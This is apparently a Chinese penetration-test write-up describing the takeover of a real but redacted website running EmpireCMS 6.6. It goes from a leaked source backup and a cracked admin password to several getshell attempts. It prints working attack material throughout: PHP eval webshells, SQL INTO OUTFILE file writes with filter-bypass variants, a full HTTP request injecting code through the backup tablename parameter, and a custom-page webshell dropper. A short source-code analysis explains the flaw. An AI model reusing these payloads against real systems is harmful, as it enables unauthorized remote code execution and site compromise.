0x00 前言
文章所述漏洞已经提交至漏洞平台,且所有恶意操作均已复原
0x01 源码泄露
http://www.xxx.com.cn/www.zip老规矩拿到源码先通关关键词找敏感信息
key
pwd
passwd
password找到了半天居然找不到一个有效的密码
最后在robots.txt中看到CMS的信息-EmpireCMS
查询知道是开源cms后,直接百度查询数据表结构
知道了管理员记录表为phome_enewsuser,在源码里全局搜索
0x02 敏感信息泄露
点击进去得到管理员用户名,密码hash和盐值
直接解md5得到口令
Kite/kite得到口令后就是找到后台地址,由于是开源的百度一下就有了
看一眼目录并没有修改后台地址,所以直接访问
http://www.xxx.com.cn/e/admin/
得到具体的版本号为6.6
0x04 历史漏洞
登录到后台后,因为是开源CMS,历史漏洞才是渗透的关键
直接搜索empireCMS漏洞,开始复现历史漏洞
1.后台-模版-公共模版-js调用登陆模版getshell
还没有开始就已经结束
Table 'hdm1010482_db.phome_enewstempgroup' doesn't exist好家伙,这是把表都删了吗
2.后台数据表与系统模型-导入数据库模型getshell
EmpireCMS 7.5以及之前版本中的e/class/moddofun.php文件的LoadInMod函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。
在本地先新建一个test.php.mod文件,内容为
<?php file_put_contents("lyy.php","<?php @eval(\$_POST['lyy']); ?>");?>填入任意表名然后选择马上导入
又是一个表不存在,GG
3.后台备份与恢复数据-执行sql语句getshell
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。
也就是后台提供了一个sql语句执行
只要服务器mysql配置secure_file_priv 不当,就可以向服务器写入文件
Payload
select '<?php @eval($_POST[123])?>' into outfile '绝对路径/e/admin/lyy.php'因为要向站点写入文件,所以必须知道绝对路径才行。
因为是无回显执行,也不能通过show mysql变量获取部分路径,所以也pass了
show variables like '%datadir%';4.后台备份与恢复数据-备份数据getshell
empirecms 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。
选择任意一个表,开始备份抓包
将tablename字段改为payload
@eval($_POST[123])请求包
POST /e/admin/ebak/phome.php HTTP/1.1
Host: www.xxx.com.cn
Content-Length: 285
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xxx.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bxubwecmsdodbdata=empirecms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirecmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwloginecmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630
Connection: close
phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename%5B%5D=@eval($_POST[123])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD回显得到备份文件夹名
hdm1010482_db_20211229152350webshell连接备份文件夹下的config.php
http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php成功getshell
原理分析
因为手里有源码,就跟了一下这个漏洞
首先定位
直接全局搜索config.php就找到了
在e/admin/ebak/class/functions.php文件中Ebak_DoEbak存在文件写入操作
$string="<?php
\$b_table=\"".$b_table."\";
".$d_table."
\$b_baktype=".$add['baktype'].";
\$b_filesize=".$add['filesize'].";
\$b_bakline=".$add['bakline'].";
\$b_autoauf=".$add['autoauf'].";
\$b_dbname=\"".$dbname."\";
\$b_stru=".$bakstru.";
\$b_strufour=".$bakstrufour.";
\$b_dbchar=\"".addslashes($add['dbchar'])."\";
\$b_beover=".$beover.";
\$b_insertf=\"".addslashes($insertf)."\";
\$b_autofield=\",".addslashes($add['autofield']).",\";
\$b_bakdatatype=".$bakdatatype.";
?>";
$cfile=$bakpath."/".$add['mypath']."/config.php";
WriteFiletext_n($cfile,$string);
可以看到直接对$d_table变量进行拼接
再看看写函数WriteFiletext_n
也没有对写入内容进行过滤,那么只需要知道如何控制$d_table变量值即可
crtl+左键跟到上面
而$count是$tablename的数量,$tablename是$add中tablename的键值
找到调用Ebak_DoEbak函数的位置,知道$add就是$_POST
那就很清楚了,他对POST传参的tablename进行了处理产生两个变量
$b_table和$d_table,其中$b_table是被双引号包裹无法利用的
但是$d_table没有双引号被包裹,且没有任意过滤直接写入.php文件,导致命令执行
为什么不是其他参数?
其他参数大部分是被双引号包裹的
没有被双引号包裹的参数都被强转int,如果传str会返回0 所以pass
3的后续
在通过漏洞4获得站点真实路径后我又构造sql语句,尝试向站点直接webshell
select '<?php phpinfo();?>' into outfile '/data/home/hmu072095/htdocs/e/admin/lyy.php'虽然爆了一个数据库连接错误,但是语句被成功执行,只是被写入的内容被替换成了空
可以成功访问但没有内容
可以写入正常字符
select 'test' into outfile '/data/home/hmu072095/htdocs/e/admin/1.txt'
初步判断是对php标签做了过滤,尝试其他写法进行绕过
1.select '<? phpinfo(); ?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'
2.select '<script language="php"> phpinfo(); </script>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'
3.select '<?php @eval($_POST[1])?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php'只有最后的asp风格成功写入
尝试访问无法执行 查了一下linux上默认不开PHP短标签配置项,溜了溜了
总结
1.通过御剑目录扫描工具对目标站点进行目录扫描,发现泄露了网站的备份文件www.zip,对其下载到本地进行源代码分析
2.通过phpstorm进行源代码加载,并搜索关键字key,pwd,password,passwd,并没有找到相关密码,通过robots.txt,发现是EmpireCMS
3.通过百度搜索EmpireCMS的数据表结构,发现phome_enewsuser为管理员记录表,通过全局批量搜索phome_enewsuser关键字,发现源码中泄露了网站的管理员的用户名和密码md5值,通过md5解密得到明文为kite
4.输入默认的后台路径/admin,可看到后台登录页面,输入得到的用户名和密码,即可登录后台。
5.在网站后台-模版-公共模版-js调用登陆模版处准备写入一句,发现表不存在,无法写入shell
6.在网站后台--系统--数据表与系统模板--管理数据表--导入系统模板,模板文件名:test.php.mod,且,存放的的数据表名为:phome_ecm_111,导入进入后,发现表不存在,无法写入shell
test.php.mod:
<?php file_put_contents("lyy.php","<?php @eval(\$_POST['lyy']); ?>");?>
7.在网站后台--系统--备份与恢复数据--执行SQL语句,写入一句话,前提条件需要:mysql配置secure_file_priv 不当,且需要知道网站绝对路径以及EmpireCMS<=7.5版本,这里无法获取到网站绝对路径,无法写入shell
show variables like '%datadir%'; //查看网站绝对路径
select '<?php @eval($_POST[123])?>' into outfile '绝对路径/e/admin/lyy.php' //写入一句话
8.empirecms 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行,那么在网站后台--系统--备份与恢复数据--恢复数据--选择任意一个表,开始备份抓包拦截。注意备份的目录,如果目录不存在,系统会自动生成一个目录名。抓包拦截,并修改,发送请求。
POST /e/admin/ebak/phome.php HTTP/1.1
Host: www.xxx.com.cn
Content-Length: 285
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://www.xxx.com.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.xxx.com.cn/e/admin/ebak/ChangeTable.php?mydbname=hdm1010482_db
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bxubwecmsdodbdata=empirecms; bxubwloginuserid=1; bxubwloginusername=Kite; bxubwloginlevel=1; bxubweloginlic=empirecmslic; bxubwloginadminstyleid=1; bxubwloginrnd=F3JiUXpyeXm6mWPTsdUG; bxubwloginecmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630
Connection: close
phome=DoEbak&mydbname=hdm1010482_db&baktype=phpinfo()&filesize=300&bakline=500&autoauf=1&bakstru=1&dbchar=gbk&bakdatatype=1&mypath=hdm1010482_db_20211229152350&insertf=replace&waitbaktime=0&readme=&autofield=&tablename%5B%5D=@eval($_POST[123])&chkall=on&Submit=%BF%AA%CA%BC%B1%B8%B7%DD
9.最终生成shell访问连接为(webshell连接备份文件夹下的config.php):http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php
10.通过蚁剑连接一句话,并获取到网站的绝对路径(/data/home/hmu072095/htdocs/e/admin/),这里可以直接通过网站后台--系统--备份与恢复数据--执行SQL语句
select '<?php phpinfo();?>' into outfile '/data/home/hmu072095/htdocs/e/admin/lyy.php' //发现被拦截:
select '<?php @eval($_POST[1])?>' into outfile '/data/home/hmu072095/htdocs/e/admin/ly.php' //可正常写入一句话
11.通过网站后台--模板管理--自定义页面--增加自定义页面--页面名称(123.php),文件名../../page.html,页面内容:
<?php fputs(fopen("shell.php","a"),'<?php phpinfo();@eval($_POST[cmd]);?>')?>
访问链接:
http://www.xxx.com/e/admin/shell.php